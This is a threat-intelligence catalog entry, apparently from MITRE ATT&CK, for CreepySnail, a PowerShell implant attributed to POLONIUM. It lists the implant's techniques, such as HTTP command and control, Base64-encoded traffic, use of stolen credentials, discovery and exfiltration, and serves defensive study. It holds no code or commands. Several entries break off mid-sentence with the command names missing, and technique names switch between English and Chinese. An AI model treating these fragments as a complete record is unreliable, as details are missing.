CreepySnail
CreepySnail is a custom PowerShell implant that has been used by POLONIUM since at least 2022.[1]
ID: S1024
ⓘ
Type: MALWARE
ⓘ
Platforms: Windows
Version: 1.0
Created: 08 July 2022
Last Modified: 08 August 2022
Techniques Used
| Domain | ID | Name | Use | |
|---|---|---|---|---|
| Enterprise | T1059 | .001 | 命令与脚本解释器: PowerShell |
CreepySnail can use PowerShell for execution, including the cmdlets |
| Enterprise | T1071 | .001 | 应用层协议: Web Protocols |
CreepySnail can use HTTP for C2.[1] |
| Enterprise | T1132 | .001 | 数据编码: Standard Encoding |
CreepySnail can use Base64 to encode its C2 traffic.[1] |
| Enterprise | T1078 | .002 | 有效账户: Domain Accounts |
CreepySnail can use stolen credentials to authenticate on target networks.[1] |
| Enterprise | T1033 | 系统所有者/用户发现 |
CreepySnail can execute |
|
| Enterprise | T1016 | 系统网络配置发现 |
CreepySnail can use |
|
| Enterprise | T1041 | 通过C2信道渗出 |
CreepySnail can connect to C2 for data exfiltration.[1] |
|